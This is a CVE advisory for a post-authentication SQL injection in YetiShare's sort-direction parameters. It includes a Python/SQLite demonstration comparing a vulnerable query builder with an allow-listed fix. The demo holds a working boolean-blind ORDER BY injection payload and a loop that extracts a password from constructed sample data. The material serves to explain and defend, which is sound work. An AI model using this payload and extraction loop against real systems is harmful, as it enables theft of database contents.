SQL Injection in MFScripts YetiShare 3.5.2 through 4.5.3 via translation_manage_text.ajax.php and *_manage.ajax.php

CVE-2019-19732 · HIGH Severity

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

translation_manage_text.ajax.php and several *_manage.ajax.php scripts in MFScripts YetiShare 3.5.2 through 4.5.3 concatenate the value of the aSortDir_0 and/or sSortDir_0 request parameter (the sort-direction field sent by DataTables server-side processing) directly into a SQL string. An attacker who controls that parameter can append arbitrary SQL and change the meaning of the query, typically to extract data from the database (SQL injection). Note the PR:H component of the CVSS vector above: the affected endpoints require an authenticated high-privilege account, so this is a post-authentication issue. Because a sort direction cannot be bound as a prepared-statement parameter, the appropriate fix is to map the parameter onto an allow-list of ASC/DESC rather than to escape it.
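To make the vulnerable pattern and its fix concrete, here is an added example; it is not YetiShare's code (which is PHP) but a Python/SQLite stand-in. It shows a query builder that concatenates the sort direction the way the advisory describes, beside an allow-listed version, and a small boolean-blind probe that recovers a value purely through the order of the returned rows. The users table, its rows, the column names and the password values are constructed for the demonstration, and the payload shape is generic to ORDER BY injection rather than taken from the advisory.

```python
import sqlite3
import string

# Constructed sample table (not YetiShare's schema): three users with made-up passwords.
SAMPLE_ROWS = [(1, "alice", "s3cret"), (2, "bob", "hunter2"), (3, "carol", "abc123")]


def _connect():
    """Fresh in-memory SQLite database seeded with the constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return db


def build_order_sql_vulnerable(sort_dir):
    """The pattern the advisory describes: the request parameter (sSortDir_0 /
    aSortDir_0) is concatenated straight into the ORDER BY clause."""
    return "SELECT id, username FROM users ORDER BY id " + sort_dir


def build_order_sql_safe(sort_dir):
    """Hardened form: the parameter is only ever mapped onto an allow-list.
    A sort direction cannot be bound as a prepared-statement parameter, so an
    allow-list (not escaping) is the right control for this clause."""
    direction = "DESC" if str(sort_dir).strip().lower() == "desc" else "ASC"
    return "SELECT id, username FROM users ORDER BY id " + direction


def fetch_ids(build, sort_dir):
    """Run the query produced by `build` and return the ids in the order the
    database yields them."""
    db = _connect()
    try:
        return [row[0] for row in db.execute(build(sort_dir))]
    finally:
        db.close()


def _oracle_payload(pos, ch):
    """Sort-direction payload (hypothetical, for illustration) that turns the
    clause into ORDER BY id * (-1 or 1): the row order reverses exactly when the
    guessed character of user 1's password is correct."""
    return (
        "* (CASE WHEN substr((SELECT password FROM users WHERE id = 1), "
        f"{pos}, 1) = '{ch}' THEN -1 ELSE 1 END)"
    )


def extract_secret(build, max_len, alphabet=string.ascii_lowercase + string.digits):
    """Boolean-blind extraction through the sort order: a reversed id list means
    the guess was right. Stops at the first position where nothing matches, so
    against the allow-listed builder it returns an empty string."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            if fetch_ids(build, _oracle_payload(pos, ch)) == [3, 2, 1]:
                recovered += ch
                break
        else:
            break
    return recovered


if __name__ == "__main__":
    print("vulnerable builder leaks:", extract_secret(build_order_sql_vulnerable, 6))
    print("allow-listed builder leaks:", repr(extract_secret(build_order_sql_safe, 6)))
```

The probe never sees an error message or the password column in the response; it only compares the order of ids, which is why escaping the parameter would not help here and why the allow-list is the fix. The same allow-list approach applies to the column-index parameter that typically accompanies the direction (map it onto a fixed list of column names), even though this advisory only names the direction parameters.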